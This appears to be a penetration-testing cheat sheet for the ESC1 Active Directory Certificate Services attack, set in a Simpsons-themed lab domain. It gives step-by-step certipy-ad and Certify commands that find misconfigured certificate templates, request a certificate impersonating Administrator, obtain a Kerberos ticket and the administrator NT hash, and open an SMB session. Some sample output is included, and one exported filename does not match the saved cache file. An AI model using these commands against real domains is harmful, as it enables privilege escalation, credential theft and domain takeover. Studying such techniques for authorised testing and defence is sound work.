ESC1

Technique

ESC1

1.0 certipy-ad

1.1 Find vulnerable ESC1 templates

Create the bloodhound dump and import:

certipy-ad find -u krustytheclown@thesimpsons.springfield.local -p krustytheclown -scheme ldap -old-bloodhound
 
certipy-ad find -u krustytheclown@thesimpsons.springfield.local -p krustytheclown -vulnerable -stdout

1.2 Certification request

In bloodhound, your will find the target group via shortest path:

certipy-ad req -username krustytheclown@thesimpsons.springfield.local -password krustytheclown -target-ip duffbrewery.springfield.local -ca 'SPRINGFIELD-CA' -template 'ESC1' -upn 'Administrator@springfield.local'

1.3 Authentication

certipy-ad auth -pfx administrator.pfx
 
[*] Using principal: administrator@springfield.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@springfield.local': aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e
 
export KRB5CCNAME=administrator.ccname
 
impacket-smbclient @duffbrewery.springfield.local -no-pass -k

2.0 Certify / Rubeus

2.1 Find vulnerable ESC1 template

certify cas
certify find

2.2 Certification request

certify request /template:!templatename /ca:!computername.!domain.local\!domain.local
 
certify request /ca:krustyland.ogdenville.local\\OGDENVILLE-CA /template:ESC1 /altname:krustyland /machine

References

• hacktricks: Misconfigured Certificate Templates - ESC1
• thehacker.recipes: ADCS ESC1